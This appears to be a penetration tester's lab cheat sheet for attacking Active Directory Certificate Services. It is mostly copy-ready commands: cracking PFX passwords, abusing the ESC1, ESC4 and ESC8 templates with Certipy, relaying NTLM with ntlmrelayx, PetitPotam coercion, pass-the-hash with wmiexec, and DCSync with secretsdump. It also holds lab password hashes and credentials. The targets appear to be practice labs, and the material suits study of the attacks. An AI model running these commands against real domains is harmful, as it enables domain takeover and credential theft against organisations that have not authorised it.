ADCS

Do you have cerificates?

Check the MD5 Hash for both

openssl x509 -noout -modulus -in baker.crt | openssl md5
openssl rsa -noout -modulus -in baker.key | openssl md5

You will need password for that key file.
If you have pfx files try to get crack the private key password

 python3 /opt/JohnTheRipper/run/pfx2john.py lewis | tee -a lewis

opt/JohnTheRipper/run/john --wordlist=/usr/share/seclists/rockyou.txt clark

Make pfx from crt and key file if you have key password

openssl pkcs12 -export -out baker.pfx -inkey baker.key -in baker.crt -passout pass:

certipy auth -pfx baker.pfx -dc-ip 10.10.11.65

If you have pfx try to remove the password for private key to make it work with certipy

openssl pkcs12 -in scott.pfx -out temp.key -nocerts -nodes
openssl pkcs12 -in scott.pfx -out temp.crt -clcerts -nokeys

openssl pkcs12 -export -out scott.pfx -inkey temp.key -in temp.crt -passout pass:

certipy auth -pfx scott.pfx -dc-ip 10.10.11.65

# Clone the Certipy repository
git clone https://github.com/ly4k/Certipy.git
cd Certipy

# Add contributor's remote repository
git remote add sploutchy https://github.com/sploutchy/Certipy.git

# Fetch and checkout the pull request branch
git fetch sploutchy
git checkout -b esc13_support sploutchy/main

# Install the modified Certipy locally
pip3 install .

# Confirm the installation
certipy --version

cme ldap ips.txt -u 'trainee' -p 'trainee' -M adcs

certipy find -vulnerable -username 'trainee' -p 'trainee'  -dc-ip 10.10.122.154

certipy find -vulnerable -username 'Rosie.Powell@cicada.vl' -p 'Cicada123'  -dc-ip 10.10.76.195 -k -target DC-JPQ225.cicada.vl

ESC1

certipy req  -u 'banking$'@retro.vl -ca 'retro-DC-CA' -template RetroClients -p 'hacker@123' -upn 'administrator@retro.vl' -dns 'dc.retro.vl' -key-size 4096 -debug

certipy req  -u 'Mail01$'@hybrid.vl -ca 'hybrid-DC01-CA' -template HybridComputers -hashes 0f916c5246fdbc7ba95dcef4126d57bd -upn 'administrator@hybrid.vl' -dns 'dc01.hybrid.vl' -key-size 4096 -debug

-ca can be found in the vulnerable template CA Name
-template is the vulnerable template itself
-u and -p are for the domain user or domain computer who have enrollment rights
-upn is the target user
-dns is the IP of domain controller
-key-size can be found in the template itself

certipy auth -pfx administrator_dc.pfx -dc-ip 10.10.82.138

Got admin hash

cme smb 10.10.82.138 -u administrator -H 252fac7066d93dd009d4fd2cd0368389

wmiexec.py administrator@dc.retro.vl -hashes aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389

Extra

certipy cert -pfx administrator.pfx -nocert -out admin.key 

certipy cert -pfx administrator.pfx -nokey -out admin.crt 

python passthecert.py -action modify_user -crt ~/certi/admin.crt -key ~/certi/admin.key -domain hybrid.vl -dc-ip 10.10.239.149 -target administrator -new-pass

ESC4

ESC4                              : 'SENDAI.VL\\ca-operators' has dangerous permissions

certipy find -vulnerable -u clifford.davey -p 'RFmoB2WplgE_3p' -dc-ip 10.10.103.222

certipy template -u clifford.davey -p 'RFmoB2WplgE_3p' -template SendaiComputer -save-old -dc-ip 10.10.103.222

This will make the certificate vulnerable to ESC1, ESC3, ESC3, ESC4. Check it again.

certipy find -vulnerable -u clifford.davey -p 'RFmoB2WplgE_3p' -dc-ip 10.10.103.222

certipy req -u clifford.davey@sendai.vl -password 'RFmoB2WplgE_3p' -ca 'sendai-DC-CA' -target dc.sendai.vl -template SendaiComputer -upn 'administrator@sendai.vl' -dns 'dc.sendai.vl'

certipy auth -pfx administrator_dc.pfx -dc-ip 10.10.103.222

You will get the hash

wmiexec.py administrator@dc.sendai.vl -hashes aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a

ESC 8

ADCS running in the domain.
A working coerce method (here we use petitpotam unauthent, but an authenticated printerbug or other coerce methods will work the same)
- There is a useful template to exploit ESC8, by default on an active directory, its name is DomainController

Check web enrollment

Let’s check if the web enrollment is up and running at : http://192.168.56.23/certsrv/certfnsh.asp
if the server asks for the authentication - The server ask for an authentication so all is fine :)

Adding relay

Add a listener to relay SMB authentication to HTTP with impacket ntlmrelayx

ntlmrelayx.py -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Coerce

Launch the coerce with petitpotam unauthenticated (this will not more work on an up to date active directory but other coerce methods authenticated will work the same) Coerce

petitpotam.py 192.168.56.1 meereen.essos.local

Getting TGT using pkinittools

Copy the certificate obtained in ntlmrelay in cert.b64 file

vim cert.b64

Issue with Pkinittool of crypto

pip3 install -I git+https://github.com/wbond/oscrypto.git

/opt/Tools/active-directory/PKINITtools

Get the tgt

python3 gettgtpkinit.py -pfx-base64 $(cat /home/jay/goad/cert.b64) 'essos.local'/'meereen$' 'meereen.ccache'

Export TGT and launch dcsync

export KRB5CCNAME=/workspace/esc8/meereen.ccache
secretsdump -k -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local

On Windows Certificate Enrollment using root ca cer file

Logon as a local computer administrator account.

You can add the Root CA certificate to the computers Trusted Root Certification Authorities store via the MMC:
1. Open the Run command and type MMC.
  1. Select File then Add/Remove Snap-in…
  2. Select Certificates, and click the Add > button.
  3. Select Computer Account, and click the Next button.
  4. Click the Finish button.
  5. Click OK
2. Expand Certificates (Local Computer).
3. Expand Trusted Root Certification Authorities.
4. Right click on Certificates, and select All Tasks, and then select Import…
  1. Certificate Import Wizard comes up.
  2. Click the Next button.
  3. Click the Browse… button and navigate to the CER file.
  4. Click the Next button.
  5. Leave the defaults, and click the Next button.
  6. Click the Finish button.